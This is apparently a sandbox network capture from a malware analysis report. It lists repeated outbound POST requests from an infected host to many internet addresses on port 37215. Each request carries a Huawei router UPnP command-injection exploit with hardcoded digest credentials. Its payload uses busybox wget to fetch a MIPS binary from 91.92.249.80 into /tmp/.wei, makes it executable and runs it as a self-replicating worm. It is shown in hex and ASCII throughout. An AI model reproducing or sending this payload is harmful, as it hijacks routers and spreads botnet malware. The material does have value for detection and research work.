                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          300192.168.2.235490841.218.68.11637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176492929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          301192.168.2.234671441.82.100.10937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176498890 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          302192.168.2.2355238157.112.205.12337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176511049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          303192.168.2.2340464197.199.52.16737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176635027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          304192.168.2.234399669.72.194.3237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176635027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          305192.168.2.2347728197.106.65.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176671028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          306192.168.2.2344782197.219.37.6537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176671982 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          307192.168.2.234070641.84.208.9337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176695108 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          308192.168.2.233418074.168.145.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176698923 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          309192.168.2.2356292197.180.44.19337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176721096 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
